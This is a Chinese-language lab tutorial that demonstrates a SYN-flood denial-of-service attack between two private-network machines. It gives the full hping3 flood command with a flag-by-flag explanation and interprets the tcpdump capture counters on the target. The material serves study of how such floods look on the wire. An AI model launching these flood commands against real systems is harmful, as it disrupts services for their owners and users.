-
需要兩臺機器,一臺扮演攻擊源,另一做目標源。
攻擊源地址:10.0.40.4
被攻擊機器地址:10.0.40.246
-
2
被攻擊的機器上安裝tcpdump,tcpdump主要是用來抓包的,看看網絡數據包是否到達。
$?yum install tcpdump -y?
-
3
首先開啟tcpdump抓取來自攻擊源的數據包,其他數據包應該過排除。
$?tcpdump -i eth0? src host 10.0.40.4
-i 是選擇哪個網卡
src 是源地址?
-
4
使用hping3進行DoS攻擊:
$?hping3 -c 5000 -d 150 -S -w 64 -p 80 --flood 10.0.40.246
-c:發送數據包的個數
-d:每個數據包的大小
-S:發送SYN數據包
-w:TCP window大小
-p:目標端口,你可以指定任意端口
–flood:盡可能快的發送數據包
1hping安裝教程
-
5
180649 packets captured??是經由pcap_loop, 或 pcap_dispatch 或 pcap_next,把包交給回調處理過的包的數量。
11042651 packets received by filter? 是tcpdump從內核中拿到的且匹配命令上行指定的過濾條件的包。
10862001 packets dropped by kernel? ?這兩個數字的差值是tcpdump抓到的,還來不及處理的包。
經過我計算
11042651-180649=10862002?
10862002 和10862001? 差一個包,具體我還沒有去尋找答案。
-
6
我們再回來看看攻擊機源機器,使用命令進行攻擊后,我們看到有8523004?packets tramitted, 0 packets received,?100% packet loss。數據包傳給對方后沒有回顯,但是10.0.40.246被攻擊機器的確是收到了我們的數據包了。
-
7
總結:
hping3工具使用源地址的機器flood攻擊,雖然顯示自己ip給對方,但是源地址的機器不會接收回顯,處理完畢后,所有的數據包全部loss狀態。